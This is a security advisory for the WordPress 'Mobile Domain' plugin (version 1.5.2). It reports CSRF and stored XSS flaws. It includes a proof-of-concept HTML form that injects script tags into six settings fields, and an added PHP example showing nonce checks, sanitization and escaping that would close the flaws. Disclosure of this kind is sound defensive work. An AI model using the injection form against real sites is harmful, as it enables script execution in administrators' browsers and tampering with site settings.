Title: WordPress 'Mobile Domain' CSRF/XSS
Version: 1.5.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/mobile-domain/
Contacted WordPress: 2015/01/26
==========================================================

## Description:
==========================================================
Redirect WordPress blog from desktop domain to mobile subdomain and create Mobile XML Sitemap.

## CSRF:
==========================================================
It is possible to change the plugin's admin settings by tricking a logged-in administrator into visiting a crafted page.


## Stored XSS:
==========================================================
Settings data submitted through the admin page is stored unsanitized and rendered back on the plugin's admin page. This allows an attacker to perform stored XSS through any of the settings fields.

PoC:
Log in as admin and submit this form (replace [URL] with the target site):
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=mobile-domain&wpmd_action=add-domain">
	<input type="text" name="domain" value="&quot;><script>alert(1);</script>"><br />
	<input type="text" name="text" value="&quot;><script>alert(2);</script>"><br />
	<input type="text" name="font" value="&quot;><script>alert(3);</script>"><br />
	<input type="text" name="fontcolor" value="&quot;><script>alert(4);</script>"><br />
	<input type="text" name="color" value="&quot;><script>alert(5);</script>"><br />
	<input type="text" name="padding" value="&quot;><script>alert(6);</script>"><br />
	<input type="submit">
</form>
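For reference, an added example (not the plugin's own code) of how a WordPress handler for the add-domain action could close both issues above: a nonce check against CSRF, input sanitization before storage, and attribute escaping at render time. The function, option and nonce names (wpmd_handle_add_domain, wpmd_domains, wpmd_nonce) are assumptions for illustration.

```php
<?php
// Added example, not the Mobile Domain plugin's code. Names below are assumed.

function wpmd_handle_add_domain() {
    // Only users permitted to change site options may reach this handler.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }

    // CSRF: a forged form on a third-party site cannot supply the per-user,
    // per-action nonce, so the request dies here before any setting changes.
    check_admin_referer( 'wpmd_add_domain', 'wpmd_nonce' );

    // Stored XSS, input side: strip tags and control characters from each
    // field before it is stored (the same six fields the PoC form targets).
    $fields = array( 'domain', 'text', 'font', 'fontcolor', 'color', 'padding' );
    $entry  = array();
    foreach ( $fields as $field ) {
        $raw             = isset( $_POST[ $field ] ) ? wp_unslash( $_POST[ $field ] ) : '';
        $entry[ $field ] = sanitize_text_field( $raw );
    }

    // Fields with a known shape get a strict allow-list check on top.
    foreach ( array( 'color', 'fontcolor' ) as $field ) {
        if ( ! preg_match( '/^#[0-9a-fA-F]{6}$/', $entry[ $field ] ) ) {
            $entry[ $field ] = '';
        }
    }
    if ( ! preg_match( '/^[0-9]{1,3}(px|em|%)?$/', $entry['padding'] ) ) {
        $entry['padding'] = '';
    }
    if ( $entry['domain'] !== sanitize_text_field( wp_parse_url( 'http://' . $entry['domain'], PHP_URL_HOST ) ) ) {
        $entry['domain'] = '';
    }

    $domains   = get_option( 'wpmd_domains', array() );
    $domains[] = $entry;
    update_option( 'wpmd_domains', $domains );
}

// Stored XSS, output side: escape when rendering, regardless of what was stored.
// A value such as "><script>alert(1);</script> becomes inert attribute text.
function wpmd_render_field( $name, $value ) {
    return '<input type="text" name="' . esc_attr( $name ) . '" value="' . esc_attr( $value ) . '">';
}

// The settings form that posts to the handler must emit the matching nonce:
// wp_nonce_field( 'wpmd_add_domain', 'wpmd_nonce' );
```

Sanitizing on input and escaping on output are both needed: the first limits what reaches the database, the second protects every place the stored value is later rendered.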


## Solution:
==========================================================
No fix available.